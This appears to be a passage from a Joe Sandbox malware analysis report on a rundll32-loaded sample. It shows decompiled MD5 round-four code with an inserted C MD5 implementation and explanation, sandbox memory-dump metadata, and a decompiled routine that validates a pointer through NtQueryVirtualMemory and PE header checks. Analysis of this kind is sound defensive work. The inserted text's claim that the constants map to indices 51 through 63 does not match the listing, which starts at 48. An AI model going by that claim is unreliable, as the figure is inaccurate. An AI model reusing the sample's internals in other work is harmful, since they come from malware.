                                                          				signed int _t255;
                                                          				signed int _t257;
                                                          				signed int _t259;
                                                          				signed int _t338;
                                                          				signed char* _t348;
                                                          				signed int _t349;
                                                          				signed int _t351;
                                                          				signed int _t353;
                                                          				signed int _t355;
                                                          				signed int _t357;
                                                          				signed int _t359;
                                                          				signed int _t361;
                                                          				signed int _t363;
                                                          				signed int _t365;
                                                          				signed int _t367;
                                                          				signed int _t376;
                                                          				signed int _t378;
                                                          				signed int _t380;
                                                          				signed int _t382;
                                                          				signed int _t384;
                                                          				intOrPtr* _t400;
                                                          				signed int* _t401;
                                                          				signed int _t402;
                                                          				signed int _t404;
                                                          				signed int _t406;
                                                          				signed int _t408;
                                                          				signed int _t410;
                                                          				signed int _t412;
                                                          				signed int _t414;
                                                          				signed int _t416;
                                                          				signed int _t418;
                                                          				signed int _t420;
                                                          				signed int _t422;
                                                          				signed int _t424;
                                                          				signed int _t432;
                                                          				signed int _t434;
                                                          				signed int _t436;
                                                          				signed int _t438;
                                                          				signed int _t440;
                                                          				signed int _t508;
                                                          				signed int _t599;
                                                          				signed int _t607;
                                                          				signed int _t613;
                                                          				signed int _t679;
                                                          				void* _t682;
                                                          				signed int _t683;
                                                          				signed int _t685;
                                                          				signed int _t690;
                                                          				signed int _t692;
                                                          				signed int _t697;
                                                          				signed int _t699;
                                                          				signed int _t718;
                                                          				signed int _t720;
                                                          				signed int _t722;
                                                          				signed int _t724;
                                                          				signed int _t726;
                                                          				signed int _t728;
                                                          				signed int _t734;
                                                          				signed int _t740;
                                                          				signed int _t742;
                                                          				signed int _t744;
                                                          				signed int _t746;
                                                          				signed int _t748;
                                                          
                                                          				_t226 = _a4;
                                                          				_t348 = __ecx + 2;
                                                          				_t401 =  &_v76;
                                                          				_t682 = 0x10;
                                                          				do {
                                                          					 *_t401 = (((_t348[1] & 0x000000ff) << 0x00000008 |  *_t348 & 0x000000ff) << 0x00000008 |  *(_t348 - 1) & 0x000000ff) << 0x00000008 |  *(_t348 - 2) & 0x000000ff;
                                                          					_t401 =  &(_t401[1]);
                                                          					_t348 =  &(_t348[4]);
                                                          					_t682 = _t682 - 1;
                                                          				} while (_t682 != 0);
                                                          				_t6 = _t226 + 4; // 0x14eb3fc3
                                                          				_t683 =  *_t6;
                                                          				_t7 = _t226 + 8; // 0x8d08458b
                                                          				_t402 =  *_t7;
                                                          				_t8 = _t226 + 0xc; // 0x56c1184c
                                                          				_t349 =  *_t8;
                                                          				asm("rol eax, 0x7");
                                                          				_t229 = ( !_t683 & _t349 | _t402 & _t683) + _v76 +  *_t226 - 0x28955b88 + _t683;
                                                          				asm("rol ecx, 0xc");
                                                          				_t351 = ( !_t229 & _t402 | _t683 & _t229) + _v72 + _t349 - 0x173848aa + _t229;
                                                          				asm("ror edx, 0xf");
                                                          				_t404 = ( !_t351 & _t683 | _t351 & _t229) + _v68 + _t402 + 0x242070db + _t351;
                                                          				asm("ror esi, 0xa");
                                                          				_t685 = ( !_t404 & _t229 | _t351 & _t404) + _v64 + _t683 - 0x3e423112 + _t404;
                                                          				_v8 = _t685;
                                                          				_t690 = _v8;
                                                          				asm("rol eax, 0x7");
                                                          				_t231 = ( !_t685 & _t351 | _t404 & _v8) + _v60 + _t229 - 0xa83f051 + _t690;
                                                          				asm("rol ecx, 0xc");
                                                          				_t353 = ( !_t231 & _t404 | _t690 & _t231) + _v56 + _t351 + 0x4787c62a + _t231;
                                                          				asm("ror edx, 0xf");
                                                          				_t406 = ( !_t353 & _t690 | _t353 & _t231) + _v52 + _t404 - 0x57cfb9ed + _t353;
                                                          				asm("ror esi, 0xa");
                                                          				_t692 = ( !_t406 & _t231 | _t353 & _t406) + _v48 + _t690 - 0x2b96aff + _t406;
                                                          				_v8 = _t692;
                                                          				_t697 = _v8;
                                                          				asm("rol eax, 0x7");
                                                          				_t233 = ( !_t692 & _t353 | _t406 & _v8) + _v44 + _t231 + 0x698098d8 + _t697;
                                                          				asm("rol ecx, 0xc");
                                                          				_t355 = ( !_t233 & _t406 | _t697 & _t233) + _v40 + _t353 - 0x74bb0851 + _t233;
                                                          				asm("ror edx, 0xf");
                                                          				_t408 = ( !_t355 & _t697 | _t355 & _t233) + _v36 + _t406 - 0xa44f + _t355;
                                                          				asm("ror esi, 0xa");
                                                          				_t699 = ( !_t408 & _t233 | _t355 & _t408) + _v32 + _t697 - 0x76a32842 + _t408;
                                                          				_v8 = _t699;
                                                          				asm("rol eax, 0x7");
                                                          				_t235 = ( !_t699 & _t355 | _t408 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
                                                          				asm("rol ecx, 0xc");
                                                          				_t357 = ( !_t235 & _t408 | _v8 & _t235) + _v24 + _t355 - 0x2678e6d + _t235;
                                                          				_t508 =  !_t357;
                                                          				asm("ror edx, 0xf");
                                                          				_t410 = (_t508 & _v8 | _t357 & _t235) + _v20 + _t408 - 0x5986bc72 + _t357;
                                                          				_v12 = _t410;
                                                          				_v12 =  !_v12;
                                                          				asm("ror esi, 0xa");
                                                          				_t718 = (_v12 & _t235 | _t357 & _t410) + _v16 + _v8 + 0x49b40821 + _t410;
                                                          				asm("rol eax, 0x5");
                                                          				_t237 = (_t508 & _t410 | _t357 & _t718) + _v72 + _t235 - 0x9e1da9e + _t718;
                                                          				asm("rol ecx, 0x9");
                                                          				_t359 = (_v12 & _t718 | _t410 & _t237) + _v52 + _t357 - 0x3fbf4cc0 + _t237;
                                                          				asm("rol edx, 0xe");
                                                          				_t412 = ( !_t718 & _t237 | _t359 & _t718) + _v32 + _t410 + 0x265e5a51 + _t359;
                                                          				asm("ror esi, 0xc");
                                                          				_t720 = ( !_t237 & _t359 | _t412 & _t237) + _v76 + _t718 - 0x16493856 + _t412;
                                                          				asm("rol eax, 0x5");
                                                          				_t239 = ( !_t359 & _t412 | _t359 & _t720) + _v56 + _t237 - 0x29d0efa3 + _t720;
                                                          				asm("rol ecx, 0x9");
                                                          				_t361 = ( !_t412 & _t720 | _t412 & _t239) + _v36 + _t359 + 0x2441453 + _t239;
                                                          				asm("rol edx, 0xe");
                                                          				_t414 = ( !_t720 & _t239 | _t361 & _t720) + _v16 + _t412 - 0x275e197f + _t361;
                                                          				asm("ror esi, 0xc");
                                                          				_t722 = ( !_t239 & _t361 | _t414 & _t239) + _v60 + _t720 - 0x182c0438 + _t414;
                                                          				asm("rol eax, 0x5");
                                                          				_t241 = ( !_t361 & _t414 | _t361 & _t722) + _v40 + _t239 + 0x21e1cde6 + _t722;
                                                          				asm("rol ecx, 0x9");
                                                          				_t363 = ( !_t414 & _t722 | _t414 & _t241) + _v20 + _t361 - 0x3cc8f82a + _t241;
                                                          				asm("rol edx, 0xe");
                                                          				_t416 = ( !_t722 & _t241 | _t363 & _t722) + _v64 + _t414 - 0xb2af279 + _t363;
                                                          				asm("ror esi, 0xc");
                                                          				_t724 = ( !_t241 & _t363 | _t416 & _t241) + _v44 + _t722 + 0x455a14ed + _t416;
                                                          				asm("rol eax, 0x5");
                                                          				_t243 = ( !_t363 & _t416 | _t363 & _t724) + _v24 + _t241 - 0x561c16fb + _t724;
                                                          				asm("rol ecx, 0x9");
                                                          				_t365 = ( !_t416 & _t724 | _t416 & _t243) + _v68 + _t363 - 0x3105c08 + _t243;
                                                          				asm("rol edx, 0xe");
                                                          				_t418 = ( !_t724 & _t243 | _t365 & _t724) + _v48 + _t416 + 0x676f02d9 + _t365;
                                                          				asm("ror esi, 0xc");
                                                          				_t726 = ( !_t243 & _t365 | _t418 & _t243) + _v28 + _t724 - 0x72d5b376 + _t418;
                                                          				asm("rol eax, 0x4");
                                                          				_t245 = (_t365 ^ _t418 ^ _t726) + _v56 + _t243 - 0x5c6be + _t726;
                                                          				asm("rol ecx, 0xb");
                                                          				_t367 = (_t418 ^ _t726 ^ _t245) + _v44 + _t365 - 0x788e097f + _t245;
                                                          				asm("rol edx, 0x10");
                                                          				_t420 = (_t367 ^ _t726 ^ _t245) + _v32 + _t418 + 0x6d9d6122 + _t367;
                                                          				_t599 = _t367 ^ _t420;
                                                          				asm("ror esi, 0x9");
                                                          				_t728 = (_t599 ^ _t245) + _v20 + _t726 - 0x21ac7f4 + _t420;
                                                          				asm("rol eax, 0x4");
                                                          				_t247 = (_t599 ^ _t728) + _v72 + _t245 - 0x5b4115bc + _t728;
                                                          				asm("rol edi, 0xb");
                                                          				_t607 = (_t420 ^ _t728 ^ _t247) + _v60 + _t367 + 0x4bdecfa9 + _t247;
                                                          				asm("rol edx, 0x10");
                                                          				_t422 = (_t607 ^ _t728 ^ _t247) + _v48 + _t420 - 0x944b4a0 + _t607;
                                                          				_t338 = _t607 ^ _t422;
                                                          				asm("ror ecx, 0x9");
                                                          				_t376 = (_t338 ^ _t247) + _v36 + _t728 - 0x41404390 + _t422;
                                                          				asm("rol eax, 0x4");
                                                          				_t249 = (_t338 ^ _t376) + _v24 + _t247 + 0x289b7ec6 + _t376;
                                                          				asm("rol esi, 0xb");
                                                          				_t734 = (_t422 ^ _t376 ^ _t249) + _v76 + _t607 - 0x155ed806 + _t249;
                                                          				asm("rol edi, 0x10");
                                                          				_t613 = (_t734 ^ _t376 ^ _t249) + _v64 + _t422 - 0x2b10cf7b + _t734;
                                                          				_t424 = _t734 ^ _t613;
                                                          				asm("ror ecx, 0x9");
                                                          				_t378 = (_t424 ^ _t249) + _v52 + _t376 + 0x4881d05 + _t613;
                                                          				asm("rol eax, 0x4");
                                                          				_t251 = (_t424 ^ _t378) + _v40 + _t249 - 0x262b2fc7 + _t378;
                                                          				asm("rol edx, 0xb");
                                                          				_t432 = (_t613 ^ _t378 ^ _t251) + _v28 + _t734 - 0x1924661b + _t251;
                                                          				asm("rol esi, 0x10");
                                                          				_t740 = (_t432 ^ _t378 ^ _t251) + _v16 + _t613 + 0x1fa27cf8 + _t432;
                                                          				asm("ror ecx, 0x9");
                                                          				_t380 = (_t432 ^ _t740 ^ _t251) + _v68 + _t378 - 0x3b53a99b + _t740;
                                                          				asm("rol eax, 0x6");
                                                          				_t253 = (( !_t432 | _t380) ^ _t740) + _v76 + _t251 - 0xbd6ddbc + _t380;
                                                          				asm("rol edx, 0xa");
                                                          				_t434 = (( !_t740 | _t253) ^ _t380) + _v48 + _t432 + 0x432aff97 + _t253;
                                                          				asm("rol esi, 0xf");
                                                          				_t742 = (( !_t380 | _t434) ^ _t253) + _v20 + _t740 - 0x546bdc59 + _t434;
                                                          				asm("ror ecx, 0xb");
                                                          				_t382 = (( !_t253 | _t742) ^ _t434) + _v56 + _t380 - 0x36c5fc7 + _t742;
                                                          				asm("rol eax, 0x6");
                                                          				_t255 = (( !_t434 | _t382) ^ _t742) + _v28 + _t253 + 0x655b59c3 + _t382;
                                                          				asm("rol edx, 0xa");
                                                          				_t436 = (( !_t742 | _t255) ^ _t382) + _v64 + _t434 - 0x70f3336e + _t255;
                                                          				asm("rol esi, 0xf");
                                                          				_t744 = (( !_t382 | _t436) ^ _t255) + _v36 + _t742 - 0x100b83 + _t436;
                                                          				asm("ror ecx, 0xb");
                                                          				_t384 = (( !_t255 | _t744) ^ _t436) + _v72 + _t382 - 0x7a7ba22f + _t744;
                                                          				asm("rol eax, 0x6");
                                                          				_t257 = (( !_t436 | _t384) ^ _t744) + _v44 + _t255 + 0x6fa87e4f + _t384;
                                                          				asm("rol edx, 0xa");
                                                          				_t438 = (( !_t744 | _t257) ^ _t384) + _v16 + _t436 - 0x1d31920 + _t257;
                                                          				asm("rol esi, 0xf");
                                                          				_t746 = (( !_t384 | _t438) ^ _t257) + _v52 + _t744 - 0x5cfebcec + _t438;
                                                          				asm("ror edi, 0xb");
                                                          				_t679 = (( !_t257 | _t746) ^ _t438) + _v24 + _t384 + 0x4e0811a1 + _t746;
                                                          				asm("rol eax, 0x6");
                                                          				_t259 = (( !_t438 | _t679) ^ _t746) + _v60 + _t257 - 0x8ac817e + _t679;
                                                          				asm("rol edx, 0xa");
                                                          				_t440 = (( !_t746 | _t259) ^ _t679) + _v32 + _t438 - 0x42c50dcb + _t259;
                                                          				_t400 = _a4;                                    /* _a4: the caller's four 32-bit state words */
                                                          				asm("rol esi, 0xf");
                                                          				_t748 = (( !_t679 | _t440) ^ _t259) + _v68 + _t746 + 0x2ad7d2bb + _t440;
                                                          				 *_t400 =  *_t400 + _t259;                      /* state[0] += A */
                                                          				asm("ror eax, 0xb");
                                                          				 *((intOrPtr*)(_t400 + 4)) = (( !_t259 | _t748) ^ _t440) + _v40 + _t679 - 0x14792c6f +  *((intOrPtr*)(_t400 + 4)) + _t748; /* last step (constant 0xeb86d391) folded into state[1] += B; the rotation from the asm line above is not shown in the expression */
                                                          				 *((intOrPtr*)(_t400 + 8)) =  *((intOrPtr*)(_t400 + 8)) + _t748;   /* state[2] += C */
                                                          				 *((intOrPtr*)(_t400 + 0xc)) =  *((intOrPtr*)(_t400 + 0xc)) + _t440; /* state[3] += D */
                                                          				return memset( &_v76, 0, 0x40);                 /* wipe the 64-byte message-block copy on the stack before returning */
                                                          			}
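The constants and rotations in the listing above identify the routine. Signed immediates such as -0x70f3336e are the decompiler's rendering of MD5's round constants (0x8f0ccc92 is T[54] in RFC 1321 numbering, 0x655b59c3 is T[53], -0x14792c6f is T[64] = 0xeb86d391), the `( !d | b) ^ c` shape is MD5's round-4 function I, the `rol 6 / rol 0xa / rol 0xf / ror 0xb` sequence is round 4's rotation schedule 6, 10, 15, 21 (ror 11 equals rol 21), the `_vNN` operands are the sixteen message words taken in round 4's `7*i mod 16` order, and the four stores at the end add the working values back into the caller's state before the local block copy is wiped. The decompiled expressions omit the rotation done by the preceding asm line, so they cannot be evaluated as written. The following is an added example, not code from the report or from the sample: a compact MD5 in C that maps the listing's immediates to the index of the constant they equal and checks the full digest against RFC 1321 test vectors, so the identification can be confirmed rather than assumed.

```c
/* Added example (not from the report): compact MD5 used to confirm that the
 * decompiled listing is MD5's fourth round followed by the state update. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* MD5 round constants T[1..64] of RFC 1321, indexed 0..63 here. */
static const uint32_t MD5_K[64] = {
    0xd76aa478, 0xe8c7b756, 0x242070db, 0xc1bdceee, 0xf57c0faf, 0x4787c62a, 0xa8304613, 0xfd469501,
    0x698098d8, 0x8b44f7af, 0xffff5bb1, 0x895cd7be, 0x6b901122, 0xfd987193, 0xa679438e, 0x49b40821,
    0xf61e2562, 0xc040b340, 0x265e5a51, 0xe9b6c7aa, 0xd62f105d, 0x02441453, 0xd8a1e681, 0xe7d3fbc8,
    0x21e1cde6, 0xc33707d6, 0xf4d50d87, 0x455a14ed, 0xa9e3e905, 0xfcefa3f8, 0x676f02d9, 0x8d2a4c8a,
    0xfffa3942, 0x8771f681, 0x6d9d6122, 0xfde5380c, 0xa4beea44, 0x4bdecfa9, 0xf6bb4b60, 0xbebfbc70,
    0x289b7ec6, 0xeaa127fa, 0xd4ef3085, 0x04881d05, 0xd9d4d039, 0xe6db99e5, 0x1fa27cf8, 0xc4ac5665,
    0xf4292244, 0x432aff97, 0xab9423a7, 0xfc93a039, 0x655b59c3, 0x8f0ccc92, 0xffeff47d, 0x85845dd1,
    0x6fa87e4f, 0xfe2ce6e0, 0xa3014314, 0x4e0811a1, 0xf7537e82, 0xbd3af235, 0x2ad7d2bb, 0xeb86d391,
};
/* Per-step left rotations; round 4 uses 6, 10, 15, 21, which is the
 * "rol 6 / rol 0xa / rol 0xf / ror 0xb" of the listing (ror 11 == rol 21). */
static const uint8_t MD5_S[64] = {
    7, 12, 17, 22, 7, 12, 17, 22, 7, 12, 17, 22, 7, 12, 17, 22,
    5,  9, 14, 20, 5,  9, 14, 20, 5,  9, 14, 20, 5,  9, 14, 20,
    4, 11, 16, 23, 4, 11, 16, 23, 4, 11, 16, 23, 4, 11, 16, 23,
    6, 10, 15, 21, 6, 10, 15, 21, 6, 10, 15, 21, 6, 10, 15, 21,
};

static uint32_t rotl32(uint32_t x, unsigned n) { return (x << n) | (x >> (32 - n)); }

/* Map a signed immediate as the decompiler prints it (e.g. -0x70f3336e) to
 * the index of the MD5 constant it equals, or -1 if it is not one. */
static int md5_constant_index(int32_t imm) {
    for (int i = 0; i < 64; i++)
        if (MD5_K[i] == (uint32_t)imm) return i;
    return -1;
}

/* One 64-byte block. As in the listing, the working values are added back
 * into state[] at the end and the local block copy is then wiped. */
static void md5_transform(uint32_t state[4], const uint8_t block[64]) {
    uint32_t m[16], a = state[0], b = state[1], c = state[2], d = state[3];
    for (int i = 0; i < 16; i++)
        m[i] = (uint32_t)block[4 * i] | (uint32_t)block[4 * i + 1] << 8 |
               (uint32_t)block[4 * i + 2] << 16 | (uint32_t)block[4 * i + 3] << 24;
    for (int i = 0; i < 64; i++) {
        uint32_t f; unsigned g;
        if (i < 16)      { f = (b & c) | (~b & d); g = i; }
        else if (i < 32) { f = (d & b) | (~d & c); g = (5 * i + 1) & 15; }
        else if (i < 48) { f = b ^ c ^ d;          g = (3 * i + 5) & 15; }
        else             { f = c ^ (b | ~d);       g = (7 * i) & 15; }  /* the listing's ( !d | b) ^ c */
        uint32_t t = d;
        d = c; c = b;
        b += rotl32(a + f + MD5_K[i] + m[g], MD5_S[i]);
        a = t;
    }
    state[0] += a; state[1] += b; state[2] += c; state[3] += d;
    memset(m, 0, sizeof m);  /* the memset(&_v76, 0, 0x40) of the listing */
}

/* Full digest with RFC 1321 padding; out receives the 16 raw digest bytes. */
static void md5_digest(const uint8_t *msg, size_t len, uint8_t out[16]) {
    uint32_t st[4] = { 0x67452301, 0xefcdab89, 0x98badcfe, 0x10325476 };
    uint8_t buf[64];
    size_t i = 0;
    for (; len - i >= 64; i += 64) md5_transform(st, msg + i);
    size_t rem = len - i;
    memset(buf, 0, sizeof buf);
    if (rem) memcpy(buf, msg + i, rem);
    buf[rem] = 0x80;
    if (rem >= 56) { md5_transform(st, buf); memset(buf, 0, sizeof buf); }
    uint64_t bits = (uint64_t)len * 8;
    for (int k = 0; k < 8; k++) buf[56 + k] = (uint8_t)(bits >> (8 * k));
    md5_transform(st, buf);
    for (int k = 0; k < 16; k++) out[k] = (uint8_t)(st[k / 4] >> (8 * (k % 4)));
}

/* 1 if md5(text) equals the given lowercase hex digest, else 0. */
static int md5_hex_equals(const char *text, const char *expected_hex) {
    uint8_t d[16]; char hex[33];
    md5_digest((const uint8_t *)text, strlen(text), d);
    for (int k = 0; k < 16; k++) snprintf(hex + 2 * k, 3, "%02x", d[k]);
    return strcmp(hex, expected_hex) == 0;
}

int main(void) {
    printf("-0x70f3336e is MD5 constant index %d\n", md5_constant_index(-0x70f3336e));
    printf("md5(\"abc\") matches RFC 1321: %d\n", md5_hex_equals("abc", "900150983cd24fb0d6963f7d28e17f72"));
    return 0;
}
```

Feeding the listing's immediates to `md5_constant_index` returns consecutive indices 51 through 63, which is exactly the tail of round 4; a single unexplained constant or a different rotation schedule would instead point at a customised or different hash, which is worth knowing before assuming the sample uses stock MD5 for its checksums.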
                                                          [Instruction address column of the listing: 0x036d4bf4 through 0x036d5299]

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: memset
                                                          • String ID:
                                                          • API String ID: 2221118986-0
                                                          • Opcode ID: b84fae2424a8dea2ca03a1429469610375b5738a21d8790c4dd2bcffc4a620be
                                                          • Instruction ID: 6e3027263c2ec6bbf908a2c07e94c7039c45dd0ab064d0f991f72c4e0d9fc82a
                                                          • Opcode Fuzzy Hash: b84fae2424a8dea2ca03a1429469610375b5738a21d8790c4dd2bcffc4a620be
                                                          • Instruction Fuzzy Hash: 9922857BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: memset
                                                          • String ID:
                                                          • API String ID: 2221118986-0
                                                          • Opcode ID: d9def6b715dbe5854ad3f939d119ea01d0ab3cc14373ec07a817a0717b2aaf57
                                                          • Instruction ID: 5f670582b5910bc9e0df30ae1249ddfabaf66fe8062cc37dc3cf4092564d890a
                                                          • Opcode Fuzzy Hash: d9def6b715dbe5854ad3f939d119ea01d0ab3cc14373ec07a817a0717b2aaf57
                                                          • Instruction Fuzzy Hash: 0822847BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID: 0-3916222277
                                                          • Opcode ID: 0b7e06ba7589124f1904bf3bd47fa6c4a2fa30603a670ddf315de8df0320b48e
                                                          • Instruction ID: ddc36d1d0b30fc324520b5dacd6e36d839ad4fee2c3b3a3019e47e0d731506f8
                                                          • Opcode Fuzzy Hash: 0b7e06ba7589124f1904bf3bd47fa6c4a2fa30603a670ddf315de8df0320b48e
                                                          • Instruction Fuzzy Hash: 8C42B030A20B56CFCB65CF69C480AAAFBF1FF49304F54856ED88B9B651D334A485CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E036D84C1(long _a4) {
                                                          				intOrPtr _v8;
                                                          				intOrPtr _v12;
                                                          				signed int _v16;
                                                          				short* _v32;
                                                          				void _v36;
                                                          				void* _t57;
                                                          				signed int _t58;
                                                          				signed int _t61;
                                                          				signed int _t62;
                                                          				void* _t63;
                                                          				signed int* _t68;
                                                          				intOrPtr* _t69;
                                                          				intOrPtr* _t71;
                                                          				intOrPtr _t72;
                                                          				intOrPtr _t75;
                                                          				void* _t76;
                                                          				signed int _t77;
                                                          				void* _t78;
                                                          				void _t80;
                                                          				signed int _t81;
                                                          				signed int _t84;
                                                          				signed int _t86;
                                                          				short* _t87;
                                                          				void* _t89;
                                                          				signed int* _t90;
                                                          				long _t91;
                                                          				signed int _t93;
                                                          				signed int _t94;
                                                          				signed int _t100;
                                                          				signed int _t102;
                                                          				void* _t104;
                                                          				long _t108;
                                                          				signed int _t110;
                                                          
                                                          				_t108 = _a4;
                                                          				_t76 =  *(_t108 + 8);                       /* candidate table pointer (field +8 of the argument) */
                                                          				if((_t76 & 0x00000003) != 0) {              /* must be 4-byte aligned */
                                                          					L3:
                                                          					return 0;
                                                          				}
                                                          				_a4 =  *[fs:0x4];                           /* TEB NtTib.StackBase */
                                                          				_v8 =  *[fs:0x8];                           /* TEB NtTib.StackLimit */
                                                          				if(_t76 < _v8 || _t76 >= _a4) {             /* pointer does not lie on this thread's stack */
                                                          					_t102 =  *(_t108 + 0xc);
                                                          					__eflags = _t102 - 0xffffffff;
                                                          					if(_t102 != 0xffffffff) {
                                                          						_t91 = 0;
                                                          						__eflags = 0;
                                                          						_a4 = 0;
                                                          						_t57 = _t76;
                                                          						do {
                                                          							_t80 =  *_t57;
                                                          							__eflags = _t80 - 0xffffffff;
                                                          							if(_t80 == 0xffffffff) {
                                                          								goto L9;
                                                          							}
                                                          							__eflags = _t80 - _t91;
                                                          							if(_t80 >= _t91) {
                                                          								L20:
                                                          								_t63 = 0;
                                                          								L60:
                                                          								return _t63;
                                                          							}
                                                          							L9:
                                                          							__eflags =  *(_t57 + 4);
                                                          							if( *(_t57 + 4) != 0) {
                                                          								_t12 =  &_a4;
                                                          								 *_t12 = _a4 + 1;
                                                          								__eflags =  *_t12;
                                                          							}
                                                          							_t91 = _t91 + 1;
                                                          							_t57 = _t57 + 0xc;
                                                          							__eflags = _t91 - _t102;
                                                          						} while (_t91 <= _t102);
                                                          						__eflags = _a4;
                                                          						if(_a4 == 0) {
                                                          							L15:
                                                          								_t81 =  *0x36da380; // 0x0      number of entries in the validated-page cache (0..16)
                                                          								_t110 = _t76 & 0xfffff000;      /* page of the candidate pointer */
                                                          								_t58 = 0;
                                                          								__eflags = _t81;
                                                          								if(_t81 <= 0) {                 /* empty cache: query the OS directly */
                                                          									L18:
                                                          									_t104 = _t102 | 0xffffffff; /* -1: current-process handle, reused below as the error return value */
                                                          									_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4); /* class 0 = MemoryBasicInformation, 0x1c bytes into _v36 */
                                                          								__eflags = _t61;
                                                          								if(_t61 < 0) {
                                                          									_t62 = 0;
                                                          									__eflags = 0;
                                                          								} else {
                                                          									_t62 = _a4;
                                                          								}
                                                          								__eflags = _t62;
                                                          								if(_t62 == 0) {
                                                          									L59:
                                                          									_t63 = _t104;
                                                          									goto L60;
                                                          								} else {
                                                          									__eflags = _v12 - 0x1000000;
                                                          									if(_v12 != 0x1000000) {              /* MEMORY_BASIC_INFORMATION.Type must be MEM_IMAGE */
                                                          										goto L59;                        /* return -1 */
                                                          									}
                                                          									__eflags = _v16 & 0x000000cc;
                                                          									if((_v16 & 0x000000cc) == 0) {       /* Protect has no writable bit (PAGE_READWRITE, PAGE_WRITECOPY, PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY): accept */
                                                          										L46:
                                                          										_t63 = 1;
                                                          										 *0x36da3c8 = 1;                /* rendered from an xchg: set the cache-busy flag and test the value it had before */
                                                          										__eflags =  *0x36da3c8;
                                                          										if( *0x36da3c8 != 0) {          /* flag was already held: return 1 without touching the cache */
                                                          											goto L60;
                                                          										}
                                                          										_t84 =  *0x36da380; // 0x0
                                                          										__eflags = _t84;
                                                          										_t93 = _t84;
                                                          										if(_t84 <= 0) {
                                                          											L51:
                                                          											__eflags = _t93;
                                                          											if(_t93 != 0) {
                                                          												L58:
                                                          												 *0x36da3c8 = 0;
                                                          												goto L5;
                                                          											}
                                                          											_t77 = 0xf;
                                                          											__eflags = _t84 - _t77;
                                                          											if(_t84 <= _t77) {
                                                          												_t77 = _t84;
                                                          											}
                                                          											_t94 = 0;
                                                          											__eflags = _t77;
                                                          											if(_t77 < 0) {
                                                          												L56:
                                                          												__eflags = _t84 - 0x10;
                                                          												if(_t84 < 0x10) {
                                                          													_t86 = _t84 + 1;
                                                          													__eflags = _t86;
                                                          													 *0x36da380 = _t86;
                                                          												}
                                                          												goto L58;
                                                          											} else {
                                                          												do {
                                                          													_t68 = 0x36da388 + _t94 * 4;      /* cache slot i */
                                                          													_t94 = _t94 + 1;
                                                          													__eflags = _t94 - _t77;
                                                          													 *_t68 = _t110;                   /* rendered from an xchg: store the page here and carry the */
                                                          													_t110 =  *_t68;                   /* displaced entry to the next slot (newest first, oldest falls off) */
                                                          												} while (_t94 <= _t77);
                                                          												goto L56;
                                                          											}
                                                          										}
                                                          										_t69 = 0x36da384 + _t84 * 4;
                                                          										while(1) {
                                                          											__eflags =  *_t69 - _t110;
                                                          											if( *_t69 == _t110) {
                                                          												goto L51;
                                                          											}
                                                          											_t93 = _t93 - 1;
                                                          											_t69 = _t69 - 4;
                                                          											__eflags = _t93;
                                                          											if(_t93 > 0) {
                                                          												continue;
                                                          											}
                                                          											goto L51;
                                                          										}
                                                          										goto L51;
                                                          									}
                                                          									_t87 = _v32;                                        /* AllocationBase: the image base */
                                                          									__eflags =  *_t87 - 0x5a4d;
                                                          									if( *_t87 != 0x5a4d) {                              /* IMAGE_DOS_HEADER.e_magic "MZ" */
                                                          										goto L59;
                                                          									}
                                                          									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;         /* e_lfanew -> IMAGE_NT_HEADERS */
                                                          									__eflags =  *_t71 - 0x4550;
                                                          									if( *_t71 != 0x4550) {                              /* Signature "PE\0\0" */
                                                          										goto L59;
                                                          									}
                                                          									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
                                                          									if( *((short*)(_t71 + 0x18)) != 0x10b) {            /* OptionalHeader.Magic: PE32 only */
                                                          										goto L59;
                                                          									}
                                                          									_t78 = _t76 - _t87;                                 /* RVA of the candidate pointer */
                                                          									__eflags =  *((short*)(_t71 + 6));                  /* FileHeader.NumberOfSections */
                                                          									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18; /* first IMAGE_SECTION_HEADER: OptionalHeader + SizeOfOptionalHeader */
                                                          									if( *((short*)(_t71 + 6)) <= 0) {
                                                          										goto L59;
                                                          									}
                                                          									_t72 =  *((intOrPtr*)(_t89 + 0xc));
                                                          									__eflags = _t78 - _t72;
                                                          									if(_t78 < _t72) {
                                                          										goto L46;
                                                          									}
                                                          									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
                                                          									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
                                                          										goto L46;
                                                          									}
                                                          									__eflags =  *(_t89 + 0x27) & 0x00000080;
                                                          									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
                                                          										goto L20;
                                                          									}
